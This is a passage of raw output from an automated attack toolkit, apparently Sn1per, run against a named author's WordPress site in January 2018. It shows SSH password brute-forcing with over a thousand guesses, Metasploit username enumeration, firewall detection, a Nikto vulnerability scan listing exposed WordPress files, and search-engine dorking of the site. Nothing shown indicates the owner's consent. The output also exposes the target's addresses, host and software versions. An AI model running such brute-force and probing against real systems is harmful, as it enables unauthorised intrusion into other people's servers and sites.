  2188. NSE: [ssh-brute] Trying username/password pair: webadmin:destiny
  2189. NSE: [ssh-brute] Trying username/password pair: sysadmin:destiny
  2190. NSE: [ssh-brute] Trying username/password pair: netadmin:destiny
  2191. NSE: [ssh-brute] Trying username/password pair: guest:destiny
  2192. NSE: [ssh-brute] Trying username/password pair: user:destiny
  2193. NSE: [ssh-brute] Trying username/password pair: web:destiny
  2194. NSE: [ssh-brute] Trying username/password pair: test:destiny
  2195. NSE: [ssh-brute] Trying username/password pair: root:alexander
  2196. NSE: [ssh-brute] Trying username/password pair: admin:alexander
  2197. NSE: [ssh-brute] Trying username/password pair: administrator:alexander
  2198. NSE: [ssh-brute] Trying username/password pair: webadmin:alexander
  2199. NSE: [ssh-brute] Trying username/password pair: sysadmin:alexander
  2200. NSE: [ssh-brute] Trying username/password pair: netadmin:alexander
  2201. NSE: [ssh-brute] Trying username/password pair: guest:alexander
  2202. NSE: [ssh-brute] Trying username/password pair: user:alexander
  2203. NSE: [ssh-brute] Trying username/password pair: web:alexander
  2204. NSE: [ssh-brute] Trying username/password pair: test:alexander
  2205. NSE: [ssh-brute] Trying username/password pair: root:christian
  2206. NSE: [ssh-brute] Trying username/password pair: admin:christian
  2207. NSE: [ssh-brute] Trying username/password pair: administrator:christian
  2208. NSE: [ssh-brute] Trying username/password pair: webadmin:christian
  2209. NSE: [ssh-brute] Trying username/password pair: sysadmin:christian
  2210. Nmap scan report for benedictpatrick.com (185.119.174.103)
  2211. Host is up (0.098s latency).
  2212. Other addresses for benedictpatrick.com (not scanned): 2a01:9cc0:0:1:1a:3:0:5e
  2213. rDNS record for 185.119.174.103: web564.webfaction.com
  2214.  
  2215. PORT STATE SERVICE VERSION
  2216. 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
  2217. | ssh-auth-methods:
  2218. | Supported authentication methods:
  2219. | publickey
  2220. |_ password
  2221. | ssh-brute:
  2222. | Accounts: No valid accounts found
  2223. |_ Statistics: Performed 1195 guesses in 181 seconds, average tps: 6.5
  2224. | ssh-hostkey:
  2225. | 2048 3f:50:e2:06:f2:30:aa:00:39:6a:23:30:f8:bd:2c:71 (RSA)
  2226. | 256 34:02:a8:b5:43:73:ad:c3:85:9e:5b:bd:23:27:0d:f4 (ECDSA)
  2227. |_ 256 5d:6f:5c:c9:eb:be:d4:2d:c3:85:9a:4a:77:dc:a2:6c (EdDSA)
  2228. |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
  2229. |_ssh-run: Failed to specify credentials and command to run.
  2230. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2231. Device type: general purpose
  2232. Running: Linux 3.X|4.X
  2233. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  2234. OS details: Linux 3.10 - 4.8, Linux 3.2 - 4.8
  2235. Network Distance: 11 hops
  2236.  
  2237. TRACEROUTE (using port 22/tcp)
  2238. HOP RTT ADDRESS
  2239. 1 0.99 ms 192.168.1.254
  2240. 2 8.67 ms 10.135.18.1
  2241. 3 30.91 ms 75.154.223.222
  2242. 4 30.73 ms lag-113.ear3.NewYork1.Level3.net (4.15.212.245)
  2243. 5 99.72 ms ae-227-3603.edge3.London15.Level3.net (4.69.167.98)
  2244. 6 97.49 ms ae-225-3601.edge3.London15.Level3.net (4.69.167.90)
  2245. 7 103.74 ms 212.187.195.54
  2246. 8 100.75 ms 185.52.26.128
  2247. 9 ... 10
  2248. 11 96.58 ms web564.webfaction.com (185.119.174.103)
  2249.  
  2250. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2251. Nmap done: 1 IP address (1 host up) scanned in 187.30 seconds
  2252. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2253. %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2254. %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2255. %% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
  2256. %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2257. %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2258. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2259. %%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2260. %%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
  2261. %%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
  2262. %%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
  2263. %%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
  2264. %%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
  2265. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
  2266. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
  2267. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2268. 
  2269.  
  2270. =[ metasploit v4.16.28-dev ]
  2271. + -- --=[ 1716 exploits - 985 auxiliary - 300 post ]
  2272. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
  2273. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2274.  
  2275. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  2276. RHOSTS => benedictpatrick.com
  2277. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  2278. RHOST => benedictpatrick.com
  2279. [*] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - Checking for false positives
  2280. [*] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - Starting scan
  2281. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'admin' not found
  2282. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'administrator' on could not connect
  2283. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'anonymous' on could not connect
  2284. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'backup' on could not connect
  2285. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'bee' on could not connect
  2286. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'ftp' not found
  2287. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'guest' not found
  2288. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'GUEST' on could not connect
  2289. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'info' on could not connect
  2290. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'mail' on could not connect
  2291. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'mailadmin' on could not connect
  2292. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'msfadmin' on could not connect
  2293. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'mysql' on could not connect
  2294. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'nobody' on could not connect
  2295. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'oracle' not found
  2296. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'owaspbwa' not found
  2297. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'postfix' not found
  2298. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'postgres' on could not connect
  2299. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'private' on could not connect
  2300. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'proftpd' on could not connect
  2301. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'public' on could not connect
  2302. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'root' on could not connect
  2303. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'superadmin' on could not connect
  2304. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'support' on could not connect
  2305. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'sys' on could not connect
  2306. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'system' on could not connect
  2307. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'systemadmin' on could not connect
  2308. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'systemadministrator' on could not connect
  2309. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'test' on could not connect
  2310. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'tomcat' on could not connect
  2311. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'user' on could not connect
  2312. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'webmaster' not found
  2313. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'www-data' not found
  2314. [-] 2a01:9cc0:0:1:1a:3:0:5e:22 - SSH - User 'Fortimanager_Access' not found
  2315. [*] Scanned 1 of 2 hosts (50% complete)
  2316. [*] 185.119.174.103:22 - SSH - Checking for false positives
  2317. [*] 185.119.174.103:22 - SSH - Starting scan
  2318. [-] 185.119.174.103:22 - SSH - User 'admin' not found
  2319. [-] 185.119.174.103:22 - SSH - User 'administrator' not found
  2320. [-] 185.119.174.103:22 - SSH - User 'anonymous' not found
  2321. [-] 185.119.174.103:22 - SSH - User 'backup' not found
  2322. [-] 185.119.174.103:22 - SSH - User 'bee' not found
  2323. [-] 185.119.174.103:22 - SSH - User 'ftp' not found
  2324. [-] 185.119.174.103:22 - SSH - User 'guest' not found
  2325. [-] 185.119.174.103:22 - SSH - User 'GUEST' not found
  2326. [-] 185.119.174.103:22 - SSH - User 'info' not found
  2327. [-] 185.119.174.103:22 - SSH - User 'mail' not found
  2328. [-] 185.119.174.103:22 - SSH - User 'mailadmin' not found
  2329. [-] 185.119.174.103:22 - SSH - User 'msfadmin' not found
  2330. [-] 185.119.174.103:22 - SSH - User 'mysql' not found
  2331. [-] 185.119.174.103:22 - SSH - User 'nobody' not found
  2332. [-] 185.119.174.103:22 - SSH - User 'oracle' not found
  2333. [-] 185.119.174.103:22 - SSH - User 'owaspbwa' not found
  2334. [-] 185.119.174.103:22 - SSH - User 'postfix' not found
  2335. [-] 185.119.174.103:22 - SSH - User 'postgres' not found
  2336. [-] 185.119.174.103:22 - SSH - User 'private' not found
  2337. [-] 185.119.174.103:22 - SSH - User 'proftpd' not found
  2338. [-] 185.119.174.103:22 - SSH - User 'public' not found
  2339. [-] 185.119.174.103:22 - SSH - User 'root' not found
  2340. [-] 185.119.174.103:22 - SSH - User 'superadmin' not found
  2341. [-] 185.119.174.103:22 - SSH - User 'support' not found
  2342. [-] 185.119.174.103:22 - SSH - User 'sys' not found
  2343. [-] 185.119.174.103:22 - SSH - User 'system' not found
  2344. [-] 185.119.174.103:22 - SSH - User 'systemadmin' not found
  2345. [-] 185.119.174.103:22 - SSH - User 'systemadministrator' not found
  2346. [-] 185.119.174.103:22 - SSH - User 'test' not found
  2347. [-] 185.119.174.103:22 - SSH - User 'tomcat' not found
  2348. [-] 185.119.174.103:22 - SSH - User 'user' not found
  2349. [-] 185.119.174.103:22 - SSH - User 'webmaster' not found
  2350. [-] 185.119.174.103:22 - SSH - User 'www-data' not found
  2351. [-] 185.119.174.103:22 - SSH - User 'Fortimanager_Access' not found
  2352. [*] Scanned 2 of 2 hosts (100% complete)
  2353. [*] Auxiliary module execution completed
  2354. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
  2355. [*] benedictpatrick.com:22 - Scanned 1 of 2 hosts (50% complete)
  2356. [+] 185.119.174.103:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
  2357. [*] benedictpatrick.com:22 - Scanned 2 of 2 hosts (100% complete)
  2358. [*] Auxiliary module execution completed
  2359.  + -- --=[Port 23 closed... skipping.
  2360.  + -- --=[Port 25 closed... skipping.
  2361.  + -- --=[Port 53 closed... skipping.
  2362.  + -- --=[Port 79 closed... skipping.
  2363.  + -- --=[Port 80 opened... running tests...
  2364.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  2365.  
  2366. ^ ^
  2367. _ __ _ ____ _ __ _ _ ____
  2368. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2369. | V V // o // _/ | V V // 0 // 0 // _/
  2370. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2371. <
  2372. ...'
  2373.  
  2374. WAFW00F - Web Application Firewall Detection Tool
  2375.  
  2376. By Sandro Gauci && Wendel G. Henrique
  2377.  
  2378. Checking http://benedictpatrick.com
  2379. Generic Detection results:
  2380. No WAF detected by the generic detection
  2381. Number of requests: 14
  2382.  
  2383.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  2384. http://benedictpatrick.com [200 OK] Email[benedict@benedictpatrick.com], Frame, HTML5, HTTPServer[nginx], IP[185.119.174.103], JQuery[1.12.4], MetaGenerator[WordPress 4.7.8], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[Benedict Patrick &#8211; Yarnsworld Novels], UncommonHeaders[link], WordPress[4.7.8], YouTube, nginx
  2385.  
  2386.  __ ______ _____ 
  2387.  \ \/ / ___|_ _|
  2388.  \ /\___ \ | | 
  2389.  / \ ___) || | 
  2390.  /_/\_|____/ |_| 
  2391.  
  2392. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  2393. + -- --=[Target: benedictpatrick.com:80
  2394. + -- --=[Site not vulnerable to Cross-Site Tracing!
  2395. + -- --=[Site not vulnerable to Host Header Injection!
  2396. + -- --=[Site vulnerable to Cross-Frame Scripting!
  2397. + -- --=[Site vulnerable to Clickjacking!
  2398.  
  2399. HTTP/1.1 405 Not Allowed
  2400. Server: nginx
  2401. Date: Sat, 06 Jan 2018 03:46:14 GMT
  2402. Content-Type: text/html
  2403. Content-Length: 166
  2404. Connection: close
  2405.  
  2406. <html>
  2407. <head><title>405 Not Allowed</title></head>
  2408. <body bgcolor="white">
  2409. <center><h1>405 Not Allowed</h1></center>
  2410. <hr><center>nginx</center>
  2411. </body>
  2412. </html>
  2413. 
  2414. HTTP/1.1 200 OK
  2415. Server: nginx
  2416. Date: Sat, 06 Jan 2018 03:46:15 GMT
  2417. Content-Type: text/html; charset=UTF-8
  2418. Transfer-Encoding: chunked
  2419. Connection: keep-alive
  2420. Vary: Accept-Encoding
  2421. Link: <http://benedictpatrick.com/wp-json/>; rel="https://api.w.org/"
  2422.  
  2423. 16
  2424. <!DOCTYPE html>
  2425. <html
  2426. 24
  2427. lang="en-US">
  2428. <head>
  2429. <meta charset="
  2430. 
  2431.  
  2432.  
  2433.  
  2434.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  2435. + -- --=[Checking if X-Content options are enabled on benedictpatrick.com... 
  2436.  
  2437. + -- --=[Checking if X-Frame options are enabled on benedictpatrick.com... 
  2438.  
  2439. + -- --=[Checking if X-XSS-Protection header is enabled on benedictpatrick.com... 
  2440.  
  2441. + -- --=[Checking HTTP methods on benedictpatrick.com... 
  2442.  
  2443. + -- --=[Checking if TRACE method is enabled on benedictpatrick.com... 
  2444.  
  2445. + -- --=[Checking for META tags on benedictpatrick.com... 
  2446. <div class="entry-meta">
  2447. <a href="http://benedictpatrick.com/let-me-read-you-a-folktale/" title="11:15 am" rel="bookmark"><time class="entry-date" datetime="2017-01-28T11:15:54+00:00" pubdate>January 28, 2017</time></a><span class="byline"> by <span class="author vcard"><a class="url fn n" href="http://benedictpatrick.com/author/admin/" title="View all posts by Benedict Patrick" rel="author">Benedict Patrick</a></span></span> </div><!-- .entry-meta -->
  2448. <footer class="entry-meta">
  2449. </footer><!-- .entry-meta -->
  2450. <div class="entry-meta">
  2451. <a href="http://benedictpatrick.com/fabulous-fantasy-fundraiser/" title="7:09 pm" rel="bookmark"><time class="entry-date" datetime="2016-12-22T19:09:21+00:00" pubdate>December 22, 2016</time></a><span class="byline"> by <span class="author vcard"><a class="url fn n" href="http://benedictpatrick.com/author/admin/" title="View all posts by Benedict Patrick" rel="author">Benedict Patrick</a></span></span> </div><!-- .entry-meta -->
  2452. <footer class="entry-meta">
  2453. </footer><!-- .entry-meta -->
  2454. <div class="nav-previous"><a href="http://benedictpatrick.com/page/2/" ><span class="meta-nav">&larr;</span> Older posts</a></div>
  2455. </aside><aside id="meta-2" class="widget widget_meta"><h1 class="widget-title">Meta</h1> <ul>
  2456.  
  2457. + -- --=[Checking for open proxy on benedictpatrick.com... 
  2458. <li>You created a new website record without the current subdomain (for example, <code>www</code>). Return to the control panel to add the current subdomain to the website record and refresh.</li>
  2459. <li>You added a new domain in the control panel but didn&#8217;t create a site record to link it with an application. Create a website record with the control panel and refresh.</li>
  2460. <li>Your website record is set for <span class="caps">HTTPS</span>, but you visited a <span class="caps">HTTP URL</span> (or vice-versa). Open the <span class="caps">URL</span> with the other protocol.</li>
  2461. <li>You tried to access your website by <span class="caps">IP</span> address. Access the website by domain name instead.</li>
  2462. <li>There is a problem with your account. Check the control panel for unresolved support tickets and check your email for recent messages from support@webfaction.com.</li>
  2463. </ul>
  2464. <p>For more details, please see <a href="http://docs.webfaction.com/software/general.html#error-site-not-configured">Error: Site not configured</a>.</p>
  2465. <p id="outro">WebFaction provides modern hosting with friendly customer support. Visit our <a href="http://www.webfaction.com/">main website</a> for more information.</p>
  2466. </body>
  2467. </html>
  2468.  
  2469. + -- --=[Enumerating software on benedictpatrick.com... 
  2470. Server: nginx
  2471.  
  2472. + -- --=[Checking if Strict-Transport-Security is enabled on benedictpatrick.com... 
  2473.  
  2474. + -- --=[Checking for Flash cross-domain policy on benedictpatrick.com... 
  2475. <span class="sep"> | </span>
  2476. Theme: Misty Lake by <a href="http://wordpress.com/themes/misty-lake/" rel="designer">WordPress.com</a>. </div><!-- .site-info -->
  2477. </footer><!-- #colophon .site-footer -->
  2478. </div><!-- #page .hfeed .site -->
  2479.  
  2480. <script type='text/javascript' src='http://benedictpatrick.com/wp-content/themes/misty-lake/js/small-menu.js?ver=20120206'></script>
  2481. <script type='text/javascript' src='http://benedictpatrick.com/wp-includes/js/wp-embed.min.js?ver=4.7.8'></script>
  2482.  
  2483. </body>
  2484. </html>
  2485. + -- --=[Checking for Silverlight cross-domain policy on benedictpatrick.com... 
  2486. <span class="sep"> | </span>
  2487. Theme: Misty Lake by <a href="http://wordpress.com/themes/misty-lake/" rel="designer">WordPress.com</a>. </div><!-- .site-info -->
  2488. </footer><!-- #colophon .site-footer -->
  2489. </div><!-- #page .hfeed .site -->
  2490.  
  2491. <script type='text/javascript' src='http://benedictpatrick.com/wp-content/themes/misty-lake/js/small-menu.js?ver=20120206'></script>
  2492. <script type='text/javascript' src='http://benedictpatrick.com/wp-includes/js/wp-embed.min.js?ver=4.7.8'></script>
  2493.  
  2494. </body>
  2495. </html>
  2496. + -- --=[Checking for HTML5 cross-origin resource sharing on benedictpatrick.com... 
  2497.  
  2498. + -- --=[Retrieving robots.txt on benedictpatrick.com... 
  2499. User-agent: *
  2500. Disallow: /wp-admin/
  2501. Allow: /wp-admin/admin-ajax.php
  2502.  
  2503. + -- --=[Retrieving sitemap.xml on benedictpatrick.com... 
  2504. <span class="sep"> | </span>
  2505. Theme: Misty Lake by <a href="http://wordpress.com/themes/misty-lake/" rel="designer">WordPress.com</a>. </div><!-- .site-info -->
  2506. </footer><!-- #colophon .site-footer -->
  2507. </div><!-- #page .hfeed .site -->
  2508.  
  2509. <script type='text/javascript' src='http://benedictpatrick.com/wp-content/themes/misty-lake/js/small-menu.js?ver=20120206'></script>
  2510. <script type='text/javascript' src='http://benedictpatrick.com/wp-includes/js/wp-embed.min.js?ver=4.7.8'></script>
  2511.  
  2512. </body>
  2513. </html>
  2514. + -- --=[Checking cookie attributes on benedictpatrick.com... 
  2515.  
  2516. + -- --=[Checking for ASP.NET Detailed Errors on benedictpatrick.com... 
  2517. <body class="error404 custom-background">
  2518. <article id="post-0" class="post error404 not-found">
  2519. </article><!-- #post-0 .post .error404 .not-found -->
  2520. <body class="error404 custom-background">
  2521. <article id="post-0" class="post error404 not-found">
  2522. </article><!-- #post-0 .post .error404 .not-found -->
  2523.  
  2524. 
  2525.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  2526. - Nikto v2.1.6
  2527. ---------------------------------------------------------------------------
  2528. + Target IP: 185.119.174.103
  2529. + Target Hostname: benedictpatrick.com
  2530. + Target Port: 80
  2531. + Start Time: 2018-01-05 22:46:23 (GMT-5)
  2532. ---------------------------------------------------------------------------
  2533. + Server: nginx
  2534. + The anti-clickjacking X-Frame-Options header is not present.
  2535. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2536. + Uncommon header 'link' found, with contents: <http://benedictpatrick.com/wp-json/>; rel="https://api.w.org/"
  2537. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2538. + No CGI Directories found (use '-C all' to force check all possible dirs)
  2539. + Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
  2540. + Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  2541. + "robots.txt" contains 2 entries which should be manually viewed.
  2542. + Server leaks inodes via ETags, header found with file /, fields: 0x588be613 0xcd2
  2543. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  2544. + OSVDB-3092: /test/: This might be interesting...
  2545. + /wp-content/plugins/hello.php: PHP error reveals file system path.
  2546. + OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
  2547. + /wp-links-opml.php: This WordPress script reveals the installed version.
  2548. + OSVDB-3092: /license.txt: License file found may identify site software.
  2549. + /wp-app.log: Wordpress' wp-app.log may leak application/system details.
  2550. + /wordpress/: A Wordpress installation was found.
  2551. + Cookie wordpress_test_cookie created without the httponly flag
  2552. + /wp-login.php: Wordpress login found
  2553. + 7451 requests: 0 error(s) and 18 item(s) reported on remote host
  2554. + End Time: 2018-01-05 23:33:42 (GMT-5) (2839 seconds)
  2555. ---------------------------------------------------------------------------
  2556. + 1 host(s) tested
  2557.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  2558. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/benedictpatrick.com-port80.jpg
  2559.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  2560.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  2561.  
  2562.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  2563.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
  2564.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
  2565.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
  2566.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
  2567.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
  2568.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  2569.  
  2570. __[ ! ] Neither war between hackers, nor peace for the system.
  2571. __[ ! ] http://blog.inurl.com.br
  2572. __[ ! ] http://fb.com/InurlBrasil
  2573. __[ ! ] http://twitter.com/@googleinurl
  2574. __[ ! ] http://github.com/googleinurl
  2575. __[ ! ] Current PHP version::[ 7.0.26-1 ]
  2576. __[ ! ] Current script owner::[ root ]
  2577. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
  2578. __[ ! ] Current pwd::[ /usr/share/sniper ]
  2579. __[ ! ] Help: php inurlbr.php --help
  2580. ------------------------------------------------------------------------------------------------------------------------
  2581.  
  2582. [ ! ] Starting SCANNER INURLBR 2.1 at [05-01-2018 23:34:22]
  2583. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  2584. It is the end user's responsibility to obey all applicable local, state and federal laws.
  2585. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  2586.  
  2587. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-benedictpatrick.com.txt ]
  2588. [ INFO ][ DORK ]::[ site:benedictpatrick.com ]
  2589. [ INFO ][ SEARCHING ]:: {
  2590. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.py ]
  2591.  
  2592. [ INFO ][ SEARCHING ]:: 
  2593. -[:::]
  2594. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  2595.  
  2596. [ INFO ][ SEARCHING ]:: 
  2597. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  2598. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.am ID: 005911257635119896548:iiolgmwf2se ]
  2599.  
  2600. [ INFO ][ SEARCHING ]:: 
  2601. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  2602.  
  2603. [ INFO ][ TOTAL FOUND VALUES ]:: [ 39 ]
  2604.  
  2605. 
  2606.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2607. |_[ + ] [ 0 / 39 ]-[23:34:33] [ - ] 
  2608. |_[ + ] Target:: [ http://benedictpatrick.com/ ]
  2609. |_[ + ] Exploit:: 
  2610. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2611. |_[ + ] More details:: 
  2612. |_[ + ] Found:: UNIDENTIFIED
  2613. 
  2614.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2615. |_[ + ] [ 1 / 39 ]-[23:34:33] [ - ] 
  2616. |_[ + ] Target:: [ http://benedictpatrick.com/newsletter/ ]
  2617. |_[ + ] Exploit:: 
  2618. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2619. |_[ + ] More details:: 
  2620. |_[ + ] Found:: UNIDENTIFIED
  2621. 
  2622.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2623. |_[ + ] [ 2 / 39 ]-[23:34:34] [ - ] 
  2624. |_[ + ] Target:: [ http://benedictpatrick.com/test/ ]
  2625. |_[ + ] Exploit:: 
  2626. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2627. |_[ + ] More details:: 
  2628. |_[ + ] Found:: UNIDENTIFIED
  2629. 
  2630.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2631. |_[ + ] [ 3 / 39 ]-[23:34:35] [ - ] 
  2632. |_[ + ] Target:: [ http://benedictpatrick.com/category/uncategorized/ ]
  2633. |_[ + ] Exploit:: 
  2634. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2635. |_[ + ] More details:: 
  2636. |_[ + ] Found:: UNIDENTIFIED
  2637. 
  2638.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2639. |_[ + ] [ 4 / 39 ]-[23:34:35] [ - ] 
  2640. |_[ + ] Target:: [ http://benedictpatrick.com/2016/12/ ]
  2641. |_[ + ] Exploit:: 
  2642. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2643. |_[ + ] More details:: 
  2644. |_[ + ] Found:: UNIDENTIFIED
  2645. 
  2646.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2647. |_[ + ] [ 5 / 39 ]-[23:34:36] [ - ] 
  2648. |_[ + ] Target:: [ http://benedictpatrick.com/author/admin/ ]
  2649. |_[ + ] Exploit:: 
  2650. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2651. |_[ + ] More details:: 
  2652. |_[ + ] Found:: UNIDENTIFIED
  2653. 
  2654.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2655. |_[ + ] [ 6 / 39 ]-[23:34:36] [ - ] 
  2656. |_[ + ] Target:: [ http://benedictpatrick.com/2016/11/ ]
  2657. |_[ + ] Exploit:: 
  2658. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2659. |_[ + ] More details:: 
  2660. |_[ + ] Found:: UNIDENTIFIED
  2661. 
  2662.  _[ - ]::--------------------------------------------------------------------------------------------------------------
